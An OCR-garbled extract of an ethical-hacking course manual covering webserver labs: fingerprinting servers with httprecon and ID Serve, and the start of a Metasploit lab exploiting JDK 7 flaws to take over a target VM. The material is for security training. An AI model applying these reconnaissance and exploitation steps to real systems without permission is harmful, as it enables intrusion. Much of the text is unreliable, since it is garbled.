Ceh v8 labs module 12 hacking webservers

C EH

H a c k in g

W

e b

Lab M a n u a l

S e r v e r s
M o d u le 12

M odule 12 - H ackin g W e b servers

H a c k in g

W e b

S e r v e r s

A. wbs r e, w ic c nb r fere t a t eh r w r , t ec m/t r ort es fw r ,
e ev r h h a e e r d o s h ad ae h o p/e, h ot ae
is t ec m ue a pc tio thath lp t d c ne tthatc nb ac se t r u h
h o p t r p li a n
e s o eliver o t n
a e ces dho g
t eIn et.
h tern
i con

key

~

[£ Z 7 V a lu a b le
in fo r m a tio n

L a b S c e n a r io
T o d a y , m o s t o f o n lin e se rv ic e s a re im p le m e n te d as w e b a p p lic a tio n s . O n lin e
b a n k in g , w e b s e a rc h e n g in e s , e m a il a p p lic a tio n s , a n d so c ia l n e tw o rk s a re ju s t a
fe w e x a m p le s o f s u c h w e b se rv ic e s. W e b c o n te n t is g e n e r a te d 111 re a l tim e b y a

k n o w le d g e

S

Test your

s o f tw a re a p p lic a tio n r u n n in g a t s e rv e r-sid e . S o h a c k e rs a tta c k 0 1 1 th e w e b s e r v e r

=‫־‬

W e b e x e r c is e

m

W o r k b o o k r e v ie w

to ste a l c re d e n tia l in f o r m a tio n , p a s s w o rd s , a n d b u s in e s s in f o r m a t io n b y D o S
(D D o s ) a tta c k s , S Y N flo o d , p in g flo o d , p o r t sc a n , s n iffin g a tta c k s , a n d so c ia l
e n g in e e rin g a tta c k s. 1 1 1 th e a re a o f w e b se c u rity , d e s p ite s tr o n g e n c r y p tio n 0 11
th e b ro w s e r - s e r v e r c h a n n e l, w e b u s e rs still h a v e 1 10 a s s u ra n c e a b o u t w h a t
h a p p e n s a t th e o th e r e n d . W e p r e s e n t a s e c u rity a p p lic a tio n th a t a u g m e n ts w e b
s e rv e rs

w ith

tr u s te d

c o -s e rv e rs

com posed

of

liig li-a s s u ra n c e

s e c u re

c o p r o c e s s o r s , c o n fig u re d w ith a p u b lic ly k n o w n g u a rd ia n p r o g r a m . W e b u s e rs
c a n th e n e s ta b lis h th e ir a u th e n tic a te d , e n c ry p te d c h a n n e ls w ith a tr u s te d c o se rv e r, w h ic h th e n c a n a c t as a tm s t e d th ird p a rty 111 th e b ro w s e r - s e r v e r
in te r a c tio n . S y ste m s are c o n s ta n tly b e in g a tta c k e d , a n d I T s e c u rity p ro f e s s io n a ls
n e e d to b e a w a re o f c o m m o n a tta c k s 0 1 1 th e w e b s e r v e r a p p lic a tio n s . A tta c k e rs
u s e s n iffe rs o r p r o t o c o l a n a ly z e rs to c a p tu r e a n d a n a ly z e p a c k e ts . I f d a ta is s e n t
a c ro s s a n e tw o r k 111 c le a r te x t, a n a tta c k e r c a n c a p tu r e th e d a ta p a c k e ts a n d u se a
s n iffe r to r e a d th e d a ta . 1 1 1 o th e r w o r d s , a s n iffe r c a n e a v e s d r o p 0 1 1 e le c tro n ic
c o n v e rs a tio n s . A p o p u la r s n iffe r is W ir e s h a rk , I t ’s a lso u s e d b y a d m in is tra to rs
f o r le g itim a te p u r p o s e s . O n e o f th e c h a lle n g e s f o r a n a tta c k e r is to g a m a c c e ss
to th e n e tw o r k to c a p tu r e th e d a ta . I t a tta c k e rs h a v e p h y s ic a l a c c e ss to a r o u t e r
0 1 ‫ ־‬sw itc h , th e y c a n c o n n e c t th e s n iffe r a n d c a p m r e all tra ffic g o in g th r o u g h th e

sy ste m . S tr o n g p h y s ic a l s e c u rity m e a s u re s h e lp m itig a te tin s risk.
A s a p e n e tr a tio n te s te r a n d e th ic a l h a c k e r o f a n o rg a n iz a tio n , y o u m u s t p ro v id e
s e c u rity to th e c o m p a n y ’s w e b se rv e r. Y o u m u s t p e r f o r m c h e c k s 0 1 1 th e w e b
s e r v e r f o r v u ln e ra b ilitie s , m is c o n fig u ra tio n s , u n p a tc h e d

s e c u rity fla w s, a n d

im p r o p e r a u th e n tic a tio n w ith e x te r n a l sy ste m s.

L a b O b je c t iv e s
T h e o b je c tiv e o f tin s la b is to h e lp s tu d e n ts le a r n to d e te c t u n p a tc h e d s e c u rity
flaw s, v e r b o s e e r r o r m e s s a g e s , a n d m u c h m o r e .
T h e o b je c tiv e o f tin s la b is to :
■
■

C ra c k r e m o te p a s s w o rd s

■

C E H Lab Manual Page 731

F o o tp r in t w e b se rv e rs

D e te c t u n p a tc h e d se c u rity flaw s

Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Stricdy Prohibited.


L a b E n v ir o n m e n t
T o e a rn ‫ ־‬o u t tin s, y o u n eed :
& T o o ls
d e m o n s tr a t e d in
t h i s la b a r e
a v a ila b le in
D:CEHT oo lsC E H v 8
M o d u le 12
H a c k in g
W e b se rv e rs

■

A c o m p u te r ru n n in g W in d o w S e r v e r 2 0 1 2 a s H o s t m a c h in e

■

A c o m p u te r r u n n in g w in d o w serv er 20 0 8 , w in d o w s 8 a n d w in d o w s 7 as a
V irtu al M a c h in e

■

A w e b b ro w s e r w ith I n te rn e t access

■

A d m in istra tiv e p rivileges to 11111 to o ls

L a b D u r a tio n
T u n e : 40 M in u te s

O v e r v ie w o f W e b S e r v e r s
A w e b serv er, w h ic h c a n b e re fe rre d to as d ie h a rd w a re , th e c o m p u te r, o r d ie
so ftw are, is th e c o m p u te r a p p lic a tio n d ia t h e lp s to d eliv er c o n te n t th a t c a n b e
a c ce sse d th r o u g h th e In te rn e t. M o s t p e o p le d u n k a w e b se rv e r is ju st th e h a rd w a re
c o m p u te r, b u t a w e b se rv e r is also th e so ftw are c o m p u te r a p p lic a tio n th a t is in stalled
111 th e h a rd w a re c o m p u te r. T lie p rim a ry fu n c tio n o f a w e b se rv e r is to d eliv er w e b

p a g es o n th e re q u e s t to clien ts u sin g th e H y p e rte x t T ra n s fe r P ro to c o l (H T T P ). T in s
m e a n s d eliv ery o f H T M L d o c u m e n ts a n d an y ad d itio n a l c o n te n t th a t m a y b e
in c lu d e d b y a d o c u m e n t, su c h as im ag es, style sh e e ts, a n d scrip ts. M a n y g e n e ric w e b
serv ers also s u p p o r t serv er-sid e s e n p tin g u sin g A c tiv e S erv e r P ag es (A SP), P H P , o r
o d ie r sc rip tin g lang u ag es. T in s m e a n s th a t th e b e h a v io r o f th e w e b se rv e r c a n b e
sc rip te d 111 sep ara te files, w lu le th e acm a l se rv e r so ftw a re re m a in s u n c h a n g e d . W e b
serv ers are n o t alw ays u s e d fo r se rv in g th e W o rld W id e WT
eb. T h e y c a n also b e
f o u n d e m b e d d e d in dev ices su c h as p rin te rs , ro u te rs, w e b c a m s a n d

serv in g o n ly a

lo c a l n e tw o rk . T lie w e b se rv e r m a y d ie n b e u s e d as a p a r t o f a sy ste m fo r
m o n ito r in g a n d / o r a d m in iste rin g th e d ev ice 111 q u e stio n . T in s u su a lly m e a n s d ia t n o
a d d itio n a l so ftw a re h a s to b e in sta lle d o n th e c lien t c o m p u te r, since o n ly a w e b
b ro w s e r is re q u ire d .

m TASK

1

O v e rv ie w

Lab T asks
R e c o m m e n d e d lab s to d e m o n s tra te w e b se rv e r hack in g :
■
■

F o o tp r in tin g a w e b serv e r u sin g th e ID S e r v e to o l

■


F o o tp r in tin g a w e b serv e r u sin g th e h t t p r e c o n to o l

E x p lo itin g Java v u ln erab ilities u s in g M e t a s p lo i t F r a m e w o r k

A ll Rights Reserved. Reproduction is Stricdy Prohibited.


L a b A n a ly s is
A n a ly z e a n d d o c u m e n t th e resu lts re la te d to d ie lab exercise. G iv e y o u r o p in io n 0 11
y o u r ta rg e t’s secu rity p o s tu re a n d e x p o su re .

P L E A S E

T A L K

T O

Y O U R

I N S T R U C T O R

R E L A T E D


T O

T H I S

I F

Y O U

H A V E

Q U E S T I O N S

L A B .

All Rights Reserved. Reproduction is Strictly Prohibited.


F o o t p r in t in g
h ttp re c o n

W

e b s e r v e r U s in g

th e

T o o l

The httprecon project undertakes research in thefield o f web serverfingerprinting,
also known as http fingerprinting
ICON KEY
/ V a lu a b le
m t o m ia t io n

Test yo u r

W e b a p p lic a tio n s a re th e m o s t i m p o r t a n t w a y s t o r a n o r g a n iz a tio n to p u b lis h
in f o r m a tio n , in te r a c t w ith I n t e r n e t u s e r s , a n d e s ta b lis h a n e - c o m m e r c e /e g o v e rn m e n t

p re s e n c e .

H o w e v e r,

if an

o rg a n iz a tio n

is

not

r ig o ro u s

in

c o n fig u rin g a n d o p e r a tin g its p u b lic w e b s ite , it m a y b e v u ln e r a b le to a v a rie ty o f
**


se c u rity th re a ts . A lth o u g h th e th r e a ts 111 c y b e rs p a c e re m a in la rg e ly th e sa m e as
111 th e p h y s ic a l w o r ld (e.g., fra u d , th e f t, v a n d a lis m , a n d te r r o r is m ) , th e y a re fa r

m

W o r k b o o k re

m o r e d a n g e r o u s as a re s u lt. O r g a n iz a tio n s c a n fa c e m o n e ta r y lo s s e s , d a m a g e to
r e p u ta tio n , 0 1 ‫ ־‬le g a l a c tio n i f a n in t r u d e r su c c e s sfu lly v io la te s th e c o n fid e n tia lity
o f th e ir d a ta . D o S a tta c k s a re e a sy f o r a tta c k e rs to a tt e m p t b e c a u s e o f th e
n u m b e r o t p o s s ib le a tta c k v e c to r s , th e v a rie ty o f a u to m a te d to o ls a v a ila b le , a n d
th e lo w skill le v e l n e e d e d to u s e th e to o ls . D o S a tta c k s , as w e ll as th r e a ts o f
in itia tin g D o S a tta c k s , a re a ls o in c re a s in g ly b e in g u s e d to b la c k m a il
o rg a n iz a tio n s . 1 1 1 o r d e r to b e a n e x p e r t e th ic a l h a c k e r a n d p e n e tr a tio n te s te r,
}‫׳‬o n m u s t u n d e r s ta n d h o w to p e r f o r m f o o tp r in tin g 0 1 1 w e b se rv e rs.

T h e o b je c tiv e o f th is la b is to h e lp s tu d e n ts le a r n to f o o t p r in t w e b s e rv e rs . I t w ill
te a c h y o u h o w to :
H T o o ls
th i s la b a r e
a v a ila b le D:CEHT o o lsC E H v 8
M o d u le 12
H a c k in g
W e b se rv e rs


■

U s e th e h tt p r e c o n to o l

■

G e t W e b se rv e r f o o t p r in t

T o c a rry o u t th e la b , y o u n e e d :
■

h t t p r e c o n to o l lo c a te d a t D :C EH -T 0 0 lsC E H v 8 M o d u le 1 2 H a c k in g
W e b s e r v e r s W e b s e r v e r F o o tp r in tin g T o o l s h t t p r e c o n

Ethical Hacking and Countemieasures Copyright © by EC-Council


■

Y o u c a n a lso d o w n lo a d d ie la te s t v e r s io n o f h t t p r e c o n f r o m th e lin k
h ttp ://w w w .c o m p u te c .c h /p r o je k te /h ttp r e c o n

■

I f y o u d e c id e to d o w n lo a d th e l a t e s t v e r s io n , th e n s c r e e n s h o ts s h o w n
111 th e la b m ig h t d if fe r

m
Httprecon is an
open-source application
that can fingerprint an
application of webservers.

■

R u n tin s to o l 111 W in d o w s S e r v e r 2 0 1 2

■

A w e b b r o w s e r w ith I n t e r n e t a c c e ss

■

A d m in is tra tiv e p riv ile g e s to r u n to o ls

L a b D u r a tio n
T u n e : 10 M in u te s

O v e r v ie w o f h t t p r e c o n
h ttp r e c o n is a to o l fo r a d v a n c e d w e b s e r v e r fin g e rp rin tin g , sim ilar to h ttp rin t. T h e
h ttp r e c o n p ro je c t d o e s r e s e a r c h 111 th e h e ld o f w e b serv er fin g e rp rin tin g , also
k n o w n as h tt p fin g e rp rin tin g . T h e g o a l is h ig h ly a c c u r a t e id e n tific a tio n o f g iv en
h ttp d im p le m e n ta tio n s.

TASK 1
F o o tp rin tin g a
W eb serv er

Lab T asks
1.

N a v ig a te to D :C E H -T o o lsC E H v 8 M o d u le 1 2 H a c k in g
W e b s e r v e r s W e b s e r v e r F o o tp r in tin g T o o l s h t t p r e c o n .

2.

D o u b le -c lic k h t t p r e c o n . e x e t o la u n c h h t t p r e c o n .

3.

T h e m a in w in d o w o f h t t p r e c o n a p p e a rs , as s h o w n 111 th e fo llo w in g
fig u re .

11

httprecon 7.3

File Configuration

Fingergrinting

Reporting

I

—
1

Help

Target
|http;//

|

|80

T ]

6 "* ”

|

GET existing | GET long request | GET nonexisbng | GET wrong protocol | HEAD existing | OPTIONS com * I *

£G1 Httprecon is distributed
as a Z IP file containing the
binary and fingerprint
databases.

Full Matchlist | Fingerprint Details | Report Preview |

| Name

j Hits

| Match

%
1

F IG U R E 1.1: httprecon main window




4.

E n t e r th e w e b s ite (U R L ) w w w .ju g g y b o y .c o m th a t y o u w a n t to
f o o t p r in t a n d se le c t th e p o r t n u m b e r .

5.

C lic k A n a ly z e to s ta r t a n a ly z in g th e e n te r e d w e b s ite .

6.

Y o u s h o u ld re c e iv e a f o o t p r in t o f th e e n te r e d w e b s ite .
h ttp re co n 7.3 - h ttp ://ju g g yb o y.co m :8 0 /
File

tewl Httprecon uses a simple
database per test case that
contains all die fingerprint
elements to determine die
given implementation.

Configuration

Fingerprinting

Reporting

Help

Target (Microsoft IIS 6.0)
I http://

▼1 | juggyboy com|

GET existing | GET long request | GET non existing | GET wrong protocol | HEAD existing | OPTIONS com * I * I

HTTP/1.1 200 O
K
bate: Thu, 1 Oct 2012 11:36:10 G T
8
M
bontent-Length: 84S1
Content-Type: text/html
Content-Location: http: //‫כ‬uggyboy.com/index.html
Laat-Modified: Tue, 0 Oct 2012 11:32:12 G T
2
M
Accept-Ranges: non®
ETag: "a47ee9091a0cdl:7a49"
Server: Microsoft-IIS/6.0
K-Powered-By: ASP.NET

Matchlst (352 Implementations) | Fingerprint Details | Report Preview |
| Name

I Hits

| Match

%|

Microsoft IIS 6.0

88

100

^

Microsoft IIS 5.0

71

80 68.

S3

71. 59

^

Miciosofl IIS 5.1

63

71 59 .

•22

Sun ONE W eb Server 61

63

71.59

V , Apache 1.3.26

62

70.45. .

O

Zeus 4.3

62

70.45...

V

Apache 1.3.37

60

6818

Microsoft IIS 7 0

m
The scan engine of
httprecon uses nine
different requests, which
are sent to the target web
server.

v

£
F IG U R E 1.2: The footprint result of the entered website

7.

C lick d ie G E T lo n g r e q u e s t tab , w h ic h w ill list d o w n d ie G E T re q u est.
T h e n click d ie F in g e r p r in t D e ta ils .
h ttp re co n 7.3 - h ttp ://ju g g yb o y.co m :8 0 /
File

Configuration

Fingerprinting

Reporting

1 l‫ ״‬J |
- L»

Help

Target (Microsoft IIS 6.0)
I Nip://

j ‫׳‬J

^

juggyboy com|

[* -

‫פ‬

GET existing | GET long request ] GET non existing | GET wrong protocol | HEAD existing | OPTIONS com * I * I

HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Thu, 1 Oct 2012 11:35:20 G T
8
H
Connection: close
Content-Length: 3
4

Matchlst (352 Implementations)

i~
~ Httprecon does not
rely on simple banner
announcements by the
analyzed software.

Protocol Version
Statuscode
Statustext
Banner
K-Povered-By
Header Spaces
Capital after Dash
Header-Order Full
Header-Order Limit

Fingerprint Details | Report F^eview |

H
TTP

1
.1
40
0

1
1

Content-Type,Date,Connection,Content-Length
Content-Type,Date,Connection,Content-Length

Ready

F IG U R E 1.3: The fingerprint and G ET long request result of the entered website


Ethical Hacking and Countenneasures Copyright © by EC-Council


L a b A n a ly s is
A n aly ze a n d d o c u m e n t d ie resu lts re la te d to th e lab exercise. G iv e y o u r o p in io n 0 11
y o u r ta rg e t’s sec im tv p o s tu re a n d e x p o su re .

P L E A S E

T A L K

T O

Y O U R

I N S T R U C T O R

R E L A T E D

T o o l/U tility

T O

I F

T H I S

Y O U

H A V E

Q U E S T I O N S

L A B .

I n f o r m a tio n C o ll e c te d / O b j e c ti v e s A c h ie v e d
O u t p u t : F o o tp r in t o f th e ju g g y b o y w e b s ite
‫י‬

c o n te n t- lo c a tio n :

‫י‬

h ttp re c o n T o o l

C o n te n t- ty p e : t e x t / h t m l

‫י‬

h t t p : / / ju g g v b o v .c o m / 1 n d e x .h tm l
E T a g : " a 4 7 e e 9 0 9 1eO cd 1:7 a49 "

‫י‬

se rv e r: M i c r o s o f t- I I S /6 .0

‫י‬

X -P o w e re d -B v : A S P .N E T

Q u e s t io n s
1.

A n a ly z e th e m a jo r d if fe re n c e s b e tw e e n classic b a n n e r - g r a b b in g o f th e
s e r v e r lin e a n d h tt p r e c o n .

2.

E v a lu a te th e ty p e o f te s t r e q u e s ts s e n t b y h t t p r e c o n to w e b se rv e rs.

I n te r n e t C o n n e c tio n R e q u ire d
0 Y es

□ No

P la tfo rm S u p p o rte d
0


C la s s ro o m

□ !L ab s



Lab

F o o t p r in t in g

a

W

e b s e r v e r U s in g

ID

S e r v e
ID Serve is a simple,free, sm all (26 Kbytes), andfastgenera/purpose Internet server
identification utility.
ICON KEY
/ V a lu a b le
in fo r m a tio n

Test yo u r

1 1 1 th e p re v io u s la b y o u h a v e le a r n e d to u s e th e h tt p r e c o n to o l, h t t p r e c o n is a

to o l fo r a d v a n c e d w e b s e rv e r fin g e rp rin tin g , s im ila r to h ttp r in t.
I t is v e ry im p o r t a n t f o r p e n e tr a tio n te s te rs to b e fa m ilia r w ith b a n n e r - g r a b b in g
te c h n iq u e s to m o n i to r s e rv e rs to e n s u r e c o m p lia n c e a n d a p p r o p r ia te se c u rity

**


m

W o r k b o o k re

u p d a te s . U s in g th is te c h n iq u e y o u c a n a lso lo c a te r o g u e s e rv e rs 0 1 ‫ ־‬d e te r m in e th e
ro le o f s e rv e rs w ith in a n e tw o rk . 1 1 1 tin s la b y o u w ill le a r n th e b a n n e r g ra b b in g
te c h n iq u e to d e te r m in e a r e m o te ta r g e t s y s te m u s in g I D S e rv e . 111 o r d e r to b e a n
e x p e r t e th ic a l h a c k e r a n d p e n e tr a ti o n te s te r, y o u m u s t u n d e r s ta n d h o w to
f o o t p r in t a w e b se rv e r.

T h is la b w ill s h o w y o u h o w to f o o t p r in t w e b s e rv e rs a n d h o w to u s e I D S erv e .
I t w ill te a c h y o u h o w to:
■
■
H T o o ls
th i s la b a r e
a v a ila b le in
D:CEHT o o lsC E H v 8
M o d u le 12
H a c k in g
W e b se rv e rs

U s e th e I D S e rv e to o l
G e t a w e b s e rv e r f o o t p r in t

T o c a rry o u t th e la b , y o u n e e d :
■

ID S e r v e lo c a te d a t D :C EH -T 0 0 lsC E H v 8 M o d u le 1 2 H a c k in g
W e b s e r v e r s W e b s e r v e r F o o tp r in tin g T o o lsID S e r v e

■

Y o u c a n also d o w n lo a d th e la te s t v e r s io n o f ID S e r v e f r o m th e lin k
h ttp : / / w w w .g r c .c o m / i d / 1 d s e r v e .h tm

■

I f y o u d e c id e to d o w n lo a d th e l a t e s t v e r s io n , th e n s c r e e n s h o ts s h o w n
111 th e la b m ig h t d if fe r


A ll Rights Reserved. Reproduction is Strictly Prohibited.


■

R u n tliis to o l o n W in d o w s S e r v e r 2 0 1 2 as h o s t m a c h in e

■

A w e b b r o w s e r w ith I n t e r n e t a c c e s s

■

A d m n iis tra tiv e p riv ile g e s to r u n to o ls

L a b D u r a tio n
T im e : 10 M in u te s
m
ID Serve is a simple,
free, small (26 Kbytes), and
fast general-purpose
Internet server
identification utility.

O v e r v ie w o f ID S e r v e
I D S erv e a tte m p ts to d e te rm in e d ie d o m a in n a m e a sso c ia te d w id i a n IP. T in s
p ro c e s s is k n o w n as a r e v e r s e DNS lo o k u p a n d is h a n d y w h e n c h e c k in g fire w a ll
lo g s o r r e c e iv in g a n IP a d d r e s s fr o m s o m e o n e . N o t all IP s th a t h a v e a fo rw a rd
d ire c tio n lo o k u p (D o m a in -to -IP ) h a v e a r e v e r s e (IP -to -D o m a in ) lo o k u p , b u t m a n y
do.

TASK 1
F o o tp rin tin g a
W eb serv er

Lab T asks
1.

111 W in d o w s S e rv e r 2 0 1 2 , n a v ig a te to D :C E H -T o o lsC E H v 8 M o d u le 1 2
H a c k in g W e b s e r v e r s W e b s e r v e r F o o tp r in tin g T o o lsID S e r v e .

2.

D o u b le -c lic k i d s e r v e . e x e to la u n c h ID S e r v e .

3.

T h e m a in w in d o w a p p e a rs . C lic k th e S e r v e r Q u e ry ta b as s h o w n in th e
fo llo w in g fig u re.

0

ID Serve

ID

In r e S rv rIdn a nU ,vl. 2
tent e e e tific tio tility 0
P rs n l S c rityF e a b S v G s n
e o a e u re wre y te e ibo

S e rv e

Copyright (c) 2003 by Gibson Research Corp.

B c go n | Se Qey
ak r u d
iver ur

Q A H lp
&/ e

Enter or copy I paste an Internet server URL or IP address here (example: www microsoft.com):

.
™

Query The Server

m

ID Serve can connect
to any server port on any
domain or IP address.

When an Internet U R L or IP has been provided above.
press this button to initiate a query of the specified seiver

Server query processing:

The server identified itself a s :

Goto ID Serve web page

Copy |

F IG U R E 2.1: Welcome screen of ID Serve

4.

111 o p ti o n

1 , e n te r

(0 1 ‫ ־‬c o p y / p a s t e a n I n t e r n e t s e rv e r U R L o r I P a d d re s s)

th e w e b s i t e (U R L ) y o u w a n t to f o o t p r in t .
5.

E n t e r h t t p : / / 1 0 .0 .0 .2 /r e a lh o m e (IP a d d re s s is w h e r e th e re a l h o m e site
is h o s te d ) in s te p 1.




6.

C lic k Q u e ry t h e S e r v e r to s ta r t q u e ry in g th e e n te r e d w e b s ite .

7.

A f te r th e c o m p le tio n o f th e q u e r y . I D S e rv e d isp la y s th e re s u lts o f th e
e n te r e d w e b s ite as s h o w n 111 th e fo llo w in g fig u re.

IDServe

, _ ID Serve uses tlie
_
standard Windows TCP
protocol when attempting
to connect to a remote
server and port.

ID

In r e S rv rIdn a nU .v . 2
tent e e e tific tio tility 10
P rs n l S c rityF e a b S v G s n
e o a e u re wre y te e ibo
Cprgt(c20bGsn eerhCr.
oyi h ) 03 y ibo Rsac o
p
£ tv rQe | Q A H lp
e e u ry
&/ e

S e rv e

B c go n
ak r u d

Enter or copy / paste an Internet server URL or IP address here (example: www miciosoft.com):

C Ihttp //I 0.0 0.2/realhome|
1

r2 [

When an Internet URL a IP has been provided above,
press this button to initiate a query of the specified server

Query The Server

Server query processing:

HT/ 120O
T P1 0 K
Cn n Tp:t x/t l
o te t- y e ethm
Ls Md dT e 0 Ag21 0:0:4 G T
at- o ifie : u , 7 u 02 6 5 6 M
Ac p R n e :bte
c e t- a g s y s
E a :" 9 d4f6 7 c 1 "__________
T q c 5 c a 2 4d :0
1 H ID Serve can almost
y=
always identify the make,
model, and version of any
web site's server software.

The server identified itself a s :

|

Copy

Goto ID Serve web page

|

F IG U R E 2.2: ID Serve detecting the footprint

L a b A n a ly s is
D o c u m e n t all d ie se rv e r in fo rm a tio n .

P L E A S E

T A L K

T O

Y O U R

I N S T R U C T O R

R E L A T E D

T o o l/U tility

T O

T H I S

I F

Y O U

H A V E

Q U E S T I O N S

L A B .

I n f o r m a tio n C o ll e c te d / O b j e c ti v e s A c h ie v e d
S e r v e r I d e n t i f i e d : M ic r o s o f t- I I S /8 .0
S e rv e r Q u e ry P ro c e s s in g :

I D S e rv e

‫י‬

H T T P / 1.1 2 0 0 o k

■

c o n te n t- T y p e : t e x t / h t m l

■

L a s t- M o d if ic a tio n : T u e , 0 7 A u g 2 0 1 2 0 6 :0 5 :4 6

■

A c c e p t-R a n g e s : b y te s

■

E T a g : " c 9 5 d c 4 a f 6 2 7 4 c d l:0 "

GMT




Q u e s t io n s
1.

A n a ly z e h o w I D S e rv e d e te r m in e s a s ite ’s w e b se rv e r.

2.

W h a t h a p p e n s i f w e e n te r a n I P a d d re s s in s te a d o f a U R L ‫׳׳‬

I n te r n e t C o n n e c tio n R e q u ire d
□ Y es

0 No

P la tfo rm S u p p o rte d
0


C la s s ro o m

0 !L a b s

A ll Rights Reserved. Reproduction is Strictly Prohibited.


3
E x p lo it in g
M

Ja v a

e t a s p lo it F r a m

V u ln e r a b ilit y

U s in g

e w o rk

Metasploitsofin r h lp s c rtya dITprofessionalsid n fys c rtyi s e, v rify
ae e s e ui n
e ti e ui su s e
vulnerabilitymig to s a dmng e p r- rv ns c rtyas smns
it ai n , n a a e x et di e e ui ses e t .
I CON KEY
£_
_

V a lu a b le
in fo r m a tio n

s

P e n e tra tio n te stin g is a m e th o d o f ev alu a tin g th e secu rity o l a c o m p u te r sy stem 0 1 ‫־‬
n e tw o rk b y sim u latin g a n a tta c k fro m m alicio u s o u tsid e rs (w h o d o n o t h a v e a n

Test yo u r
k n o w le d g e

‫ב‬
‫ב‬


ca

a u th o riz e d m e a n s o f a c cessin g th e o rg a n iz a tio n 's system s) a n d m alicio u s in sid ers
(w h o h a v e so m e level o f a u th o riz e d access). T h e p ro c e s s in v o lv e s a n activ e analysis

W o r k b o o k r e v ie w

o f th e sy ste m fo r a n y p o te n tia l v u ln erab ilities th a t c o u ld re su lt fro m p o o r o r
im p ro p e r sy ste m c o n fig u ra tio n , e ith e r k n o w n a n d u n k n o w n h a rd w a re 0 1 ‫ ־‬so ftw are
flaw s, 01 ‫ ־‬o p e ra tio n a l w e a k n e sse s 111 p ro c e s s o r te c h n ic a l c o u n te rm e a s u re s. T in s
analysis is e a rn e d o u t fro m th e p o s itio n o f a p o te n tia l a tta c k e r a n d c a n in v o lv e active
e x p lo ita tio n o f secu rity vuln erab ilities. T h e M e ta sp lo it P ro je c t is a c o m p u te r se c u n tv
p ro je c t

th a t p ro v id e s

in fo rm a tio n

about

secu rity v u ln erab ilities

and

aids in

p e n e tra tio n te stin g a n d ID S signaU ire d e v e lo p m e n t. Its m o s t w e ll-k n o w n su b p ro je c t is th e o p e n -s o u rc e M e ta sp lo it F ra m e w o rk , a to o l fo r d e v e lo p in g an d
e x e c u tin g ex p lo it c o d e ag ain st a re m o te ta rg e t m a c h in e . O th e r im p o rta n t su b p ro je c ts in c lu d e d ie O p c o d e D a ta b a se , sh ellco d e arcluv e, a n d secu rity research .
M e ta sp lo it F ra m e w o rk is o n e o f th e m a in

to o ls

fo r e v ery p e n e tra tio n

te st

e n g a g e m e n t. T o b e a n e x p e rt etliical h a c k e r a n d p e n e tra tio n te ste r, y o u m u s t h a v e
s o u n d u n d e rs ta n d in g o f ]M etasploit F ra m e w o rk , its v a rio u s m o d u le s, ex p lo its,
J T T o o ls
t h i s la b a r e
a v a ila b le in
D:CEHT o o lsC E H v 8
M o d u le 12
H a c k in g
W e b se rv e rs


p ay lo ad s, a n d c o m m a n d s 111 o rd e r to p e rf o rm a p e n te st o f a target.

T h e o b je ctiv e o f tin s lab is to d e m o n s tra te ex p lo ita tio n o t JD K
ta k e c o n tro l o t a ta rg e t m ac h in e .

v u ln erab ilities to

1 1 1 d iis lab , y o u n eed :



■

M e ta s p lo it lo c a te d a t D :C E H -ToolsC E H v8 M o d u le 1 2 H a c k in g
W e b se rv e rsY W e b se rv e r A tta c k T o o ls M e ta s p lo it

■

Y o u c a n also d o w n lo a d th e la te st v e rs io n o t M e ta s p lo it F ra m e w o r k fro m
d ie lin k h t t p : / A v w w .m eta sp lo 1 t . c o m / d o w n lo a d /

■

I t y o u d e c id e to d o w n lo a d th e l a t e s t v e rs io n , th e n sc re e n sh o ts s h o w n 111
th e lab m ig h t d itte r

■

A c o m p u te r ru n n in g W in d o w s S e r v e r 2 0 1 2 as h o s t m a c h in e

■

W in d o w s 8 ru n n in g o n v irtu a l m a c h in e as ta rg e t m a c h in e

■

A w e b b ro w se r a n d M ic ro so ft .N E T F ra m e w o rk 2.0 o r la te r in b o th h o s t
a n d ta rg e t m a c h in e

■

j R E 7116 ru n n in g o n th e ta rg e t m a c h in e (re m o v e a n y o th e r v e rs io n o f jR E
in stalled 111 d ie ta rg e t m a c h in e ).T h e |R E 7116 se tu p file (jre-7u6-w111dows1586.exe) is available a t D :C E H -ToolsC E H v8 M o d u le 1 2 H a c k in g
W e b s e r v e r s W e b s e r v e r A tta c k T o o ls M e ta s p lo it

■

Y o u c a n also d o w n lo a d th e T h e I R E 7116 s e tu p tile at
h t t p : / A v w w .o ra c le .c o m /te c h n e tw o r k /ia v a /ja v a s e /d o w n lo a d s /ir e 7 d o w n lo a d s^ 163~ 5S S .htm l

■

D o u b le -c lic k m e ta s p lo it- la te s t- w in d o w s - in s ta lle r .e x e a n d fo llo w th e
w iz a rd -d riv e n in sta lla tio n ste p s to install M e ta s p lo it F ra m e w o r k

T im e : 2 0 M in u te s

O v e r v ie w o f t h e L a b
T in s lab d e m o n s tra te s th e e x p lo it th a t tak es a d v a n ta g e o f tw o issu es 111 J D K 7: th e
C la ssF in d e r a n d M e d io d F in d e r.fm d M e d io d (). B o th w e re n e w ly in tro d u c e d 111 J D K
7. C la ssF in d e r is a re p la c e m e n t to r c la s sF o rN a m e b a c k 111 J D K 6. I t allow s u n tr u s te d
c o d e to o b ta in a re fe re n c e a n d h a v e access to a re s tric te d p ac k a g e in J D K 7, w h ic h
can

be

u se d

to

a b u se

s u n .a w t.S u n T o o lk it

(a

re s tric te d

p ack ag e).

W ith

su n .a w t.S u n T o o lk it, w e ca n actually in v o k e getF ieldQ b y a b u sin g fin d M e th o d Q m
S ta te m e n t.in v o k e ln te rn a lO (b u t getF ieldQ m u s t b e p u b lic , a n d th a t's n o t alw ays d ie
case

*

t a s k

1

In s ta llin g
M e ta s p lo it
F ra m e w o r k


111

JD K

6.

111 o rd e r

to

access

S ta te m e n ta c c 's

p riv a te

field,

m o d ify

1.

In stall M e ta s p lo it o n th e h o s t m a c h in e W in d o w s S e r v e r 2 0 1 2 .

2.

A fte r in stallatio n c o m p le te s , it w ill au to m atically o p e n in y o u r d e fa u lt w e b
b ro w se r as s h o w n 111 th e fo llo w in g figure.

3.

C lick I U n d e r s ta n d t h e R is k s to c o n tin u e .



J U‫׳‬
! *rud«JC n e l o
onrin

1-

1♦

rt -p:’l i i o t 9
ts• o a t s . 0

C

5 w

-I‫* * ־‬

‫־‬I - G o l
*
oge

This Connection is Untrusted
You h v a k dF rfxt c n e tscr * ‫ ׳‬ol c BrosU7 0 tj we cantc n i mt a y u
a e s e ieo o o n c eu e ) t o a
9 . -t
o f r ht o!

H ie exploit takes advantage
of two issues in JD K 7:
The ClassFinder and
